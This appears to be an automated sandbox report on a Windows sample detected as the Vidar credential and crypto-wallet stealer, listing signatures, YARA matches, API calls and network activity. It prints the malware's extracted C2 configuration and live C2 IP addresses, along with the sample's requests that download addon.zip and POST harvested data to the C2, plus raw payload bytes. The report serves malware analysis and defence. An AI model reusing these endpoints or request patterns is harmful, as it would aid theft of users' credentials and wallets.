Edit tour

Windows Analysis Report
06625899.exe

Overview

General Information

Sample Name:	06625899.exe
Analysis ID:	877001
MD5:	22cd094d925fb41f446ed4db24cc8c35
SHA1:	c316b3fa0e1357ed5815002b0354e8503d5ee038
SHA256:	9edb64bf310212bffcc2fa176b22b570d071fb38873292a1a1ada19f8536231c
Infos:

Detection

Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Detected unpacking (overwrites its own PE header)

Yara detected Vidar stealer

Detected unpacking (changes PE section rights)

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Uses known network protocols on non-standard ports

Machine Learning detection for sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

AV process strings found (often used to terminate AV products)

Extensive use of GetProcAddress (often used to hide API calls)

Uses a known web browser user agent for HTTP communication

Detected TCP or UDP traffic on non-standard ports

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

06625899.exe (PID: 7120 cmdline: C:\Users\user\Desktop\06625899.exe MD5: 22CD094D925FB41F446ED4DB24CC8C35)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199508624021", "https://t.me/looking_glassbot"], "Botnet": "667e85c8112da056f901292caf82b3ed"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x13a8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Process Memory Space: 06625899.exe PID: 7120	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 06625899.exe PID: 7120	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 06625899.exe PID: 7120	Windows_Trojan_Vidar_114258d5	unknown	unknown	0x183c66:$a1: BinanceChainWallet 0x183c79:$a1: BinanceChainWallet 0x6f1ca:$a2: wallet.dat 0x18573c:$a2: wallet.dat 0x17459e:$a3: SOFTWARE\monero-project\monero-core 0x2918f:$b1: CC\%s_%s.txt 0x291d6:$b1: CC\%s_%s.txt 0x383eb:$b1: CC\%s_%s.txt 0x38432:$b1: CC\%s_%s.txt 0x629d4:$b1: CC\%s_%s.txt 0x62a1b:$b1: CC\%s_%s.txt 0x287dd:$b2: History\%s_%s.txt 0x28c66:$b2: History\%s_%s.txt 0x37a39:$b2: History\%s_%s.txt 0x37ec2:$b2: History\%s_%s.txt 0x62022:$b2: History\%s_%s.txt 0x624ab:$b2: History\%s_%s.txt 0x287c9:$b3: Autofill\%s_%s.txt 0x28c53:$b3: Autofill\%s_%s.txt 0x37a25:$b3: Autofill\%s_%s.txt 0x37eaf:$b3: Autofill\%s_%s.txt
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.06625899.exe.2320e67.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.06625899.exe.2320e67.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.3.06625899.exe.2380000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.06625899.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.3.06625899.exe.2380000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.06625899.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199508624021", "https://t.me/looking_glassbot"], "Botnet": "667e85c8112da056f901292caf82b3ed"}

Machine Learning detection for sample

Source: 06625899.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00415040 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00415040
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00409EC0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,_memset,CryptBinaryToStringA,	0_2_00409EC0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00415180 _malloc,_malloc,CryptUnprotectData,	0_2_00415180
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00401430 _memset,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,	0_2_00401430
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00414D80 _memset,lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,	0_2_00414D80
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00414FC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00414FC0

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\06625899.exe

Unpacked PE file: 0.2.06625899.exe.400000.0.unpack

Source: 06625899.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\06625899.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49684 version: TLS 1.2

Source:	Binary string: C:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe
Source:	Binary string: uDC:\yukigusorefu\murebobunuxac\tuju payuxax-nus\w.pdb source: 06625899.exe

Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00424100 FindFirstFileW,_wcslen,FindNextFileW,_wcslen,FindNextFileW,	0_2_00424100
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00416500 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00416500
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_004118B0 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_004118B0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00416B10 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,	0_2_00416B10
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00411B90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00411B90
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0040BC20 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_strlen,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,	0_2_0040BC20
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00411DD0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,_memset,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00411DD0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0041AFF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose,	0_2_0041AFF0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_0040B190 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlen,_memset,	0_2_0040B190
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_004162F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_004162F0
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00416770 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose,	0_2_00416770
Source: C:\Users\user\Desktop\06625899.exe	Code function: 0_2_00409F60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00409F60

Source: C:\Users\user\Desktop\06625899.exe

Code function: 0_2_0040D1C0 _memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,_strlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

0_2_0040D1C0

Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\06625899.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 30303
Source: unknown	Network traffic detected: HTTP traffic on port 30303 -> 49685

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199508624021
Source: Malware configuration extractor	URLs: https://t.me/looking_glassbot

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View	IP Address: 188.34.154.187 188.34.154.187
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Source: global traffic	HTTP traffic detected: GET /looking_glassbot HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic	HTTP traffic detected: GET /667e85c8112da056f901292caf82b3ed HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303
Source: global traffic	HTTP traffic detected: GET /addon.zip HTTP/1.1User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----0606627400761024User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36Host: 188.34.154.187:30303Content-Length: 143185Connection: Keep-AliveCache-Control: no-cache

Source: global traffic

TCP traffic: 192.168.2.3:49685 -> 188.34.154.187:30303

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49684
Source: unknown	Network traffic detected: HTTP traffic on port 49684 -> 443

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sun, 28 May 2023 08:46:23 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf

Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.46.113
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.46.113
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.46.113
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187
Source: unknown	TCP traffic detected without corresponding DNS query: 188.34.154.187

Source: 06625899.exe, 00000000.00000003.402473646.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303//
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/667e85c8112da056f901292caf82b3ed
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/667e85c8112da056f901292caf82b3edZ5
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/:
Source: 06625899.exe, 00000000.00000002.413121737.00000000031BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/CVOHV.xlsx
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/T
Source: 06625899.exe, 00000000.00000003.404755514.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/addon.zip
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/addon.zip&u;y
Source: 06625899.exe, 00000000.00000003.404755514.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/addon.zip0
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/addon.zip=u&y
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/e5
Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303/n
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://188.34.154.187:30303;
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113/667e85c8112da056f901292caf82b3ed
Source: 06625899.exe, 00000000.00000002.412555113.00000000008CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113/667e85c8112da056f901292caf82b3ed8
Source: 06625899.exe, 00000000.00000002.412555113.00000000008CB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113/667e85c8112da056f901292caf82b3edx
Source: 06625899.exe, 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113:80
Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113:80/
Source: 06625899.exe, 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, 06625899.exe, 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113:80peppppzxc.ziphttps://t.me/looking_glassbotlookataddon.zipMozilla/5.0
Source: 06625899.exe, 00000000.00000002.412510711.0000000000838000.00000040.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.46.113:8A
Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.404755514.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000003.402473646.0000000000900000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsup30303/667e85c8112da056f901292caf82b3ed
